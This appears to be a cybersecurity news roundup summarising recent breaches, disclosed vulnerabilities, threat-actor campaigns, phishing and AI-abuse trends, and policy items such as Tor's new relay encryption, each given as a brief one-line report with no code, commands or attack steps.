Major Incidents or Breaches

  • Dartmouth College disclosed a data breach after the Clop extortion gang leaked data allegedly stolen from Oracle E-Business Suite servers.
  • The OnSolve CodeRED platform suffered a cyberattack disrupting emergency notification systems used by state and local governments, police departments, and schools across the US.
  • Major US banks were impacted by a hack of SitusAMC, resulting in the theft of corporate data such as accounting records and legal agreements. No ransomware was deployed.
  • Harvard University confirmed a compromise of a system containing alumni, donor, student, and staff information, following a phone phishing attack.
  • Researchers identified that years of credential leaks—including passwords and API keys—originated from organizations pasting sensitive data into public online tools like JSONFormatter and CodeBeautify, affecting banks, governments, and tech firms.

Newly Discovered Vulnerabilities

  • Five vulnerabilities in Fluent Bit, an open source logging tool, were disclosed, potentially enabling path traversal, remote code execution, denial-of-service, and tag manipulation attacks against cloud services.
  • A hardware module was demonstrated that can bypass AMD and Intel memory encryption, undermining confidential computing protections.
  • WhatsApp closed an API loophole that previously allowed researchers to scrape data on 3.5 billion accounts, including profile photos and “about” text.

Notable Threat Actor Activity

  • The Clop ransomware gang was responsible for the Dartmouth College data breach via exploitation of Oracle E-Business Suite.
  • ToddyCat, a known threat actor, deployed new tools including TCSectorCopy to steal Outlook emails and Microsoft 365 access tokens from corporate targets.
  • DPRK-linked actor “FlexibleFerret” continued to refine social engineering and credential theft campaigns targeting macOS users, notably in the “Contagious Interview” campaign.
  • Chinese state-linked hackers targeted Russian IT organizations using commercial cloud services for command and control to evade detection.
  • Russian threat actors targeted a US engineering firm due to its work for a Ukrainian sister city, but the attack was detected before causing operational impact.
  • Iranian cyber operations were linked to “cyber-enabled kinetic targeting,” aiding real-world missile strikes by providing targeting support.
  • CISA issued warnings about spyware campaigns focusing on high-value messaging app users.
  • A new ClickFix variant, dubbed “JackFix,” leveraged fake Windows update pop-ups on adult sites and images to deliver multiple stealers, circumventing previous mitigations.
  • A campaign was observed where Blender Foundation 3D asset files were weaponized to deliver StealC V2 information-stealing malware.
  • The “Shai-Hulud” supply chain attack infected 640 npm packages with a self-replicating worm capable of erasing home directories if propagation fails.

Trends, Tools, or Tactics of Interest

  • The FBI reported a surge in account takeover (ATO) fraud, with cybercriminals impersonating bank support teams and stealing over $262 million since January 2025.
  • Researchers and the FBI cite a rise in AI-driven phishing and holiday-themed scams, with threat actors leveraging AI to scale attacks, automate reconnaissance, and craft highly convincing lures.
  • Malicious large language models (LLMs) such as WormGPT 4 and KawaiiGPT are being used by cybercriminals for phishing, malware development, and reconnaissance.
  • Sophisticated phishing attacks continue to bypass advanced enterprise security measures.
  • The new ClickFix/JackFix campaigns utilize psychological pressure and technical evasion to increase infection rates, including hiding malware in PNG images and faking Windows updates.
  • The use of public code beautifier and formatter tools as inadvertent credential leak vectors is a persistent issue across multiple sectors.
  • Threat actors are increasingly exploiting supply chain weaknesses, as seen in the 2025 systemic ransomware events affecting Jaguar Land Rover and other automotive manufacturers.

Regulatory or Policy Developments Affecting the Security Industry

  • Tor announced the adoption of the new Counter Galois Onion (CGO) relay encryption algorithm, replacing the older tor1 design to improve circuit traffic security.
  • US Immigration and Customs Enforcement (ICE) raised the cap on its immigrant-tracking program, offering up to $280 million to private surveillance firms, expanding the scope of surveillance-related contracts.